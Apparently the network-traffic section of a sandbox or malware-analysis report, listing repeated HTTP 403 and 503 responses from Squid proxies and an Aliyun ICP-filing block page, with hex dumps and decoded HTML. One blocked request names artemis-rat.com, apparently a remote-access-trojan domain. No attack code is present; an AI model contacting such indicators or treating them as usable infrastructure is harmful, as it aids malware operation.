Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/5.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_CONNECT_FAIL 101Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2021 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><titl
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 53
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:56 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 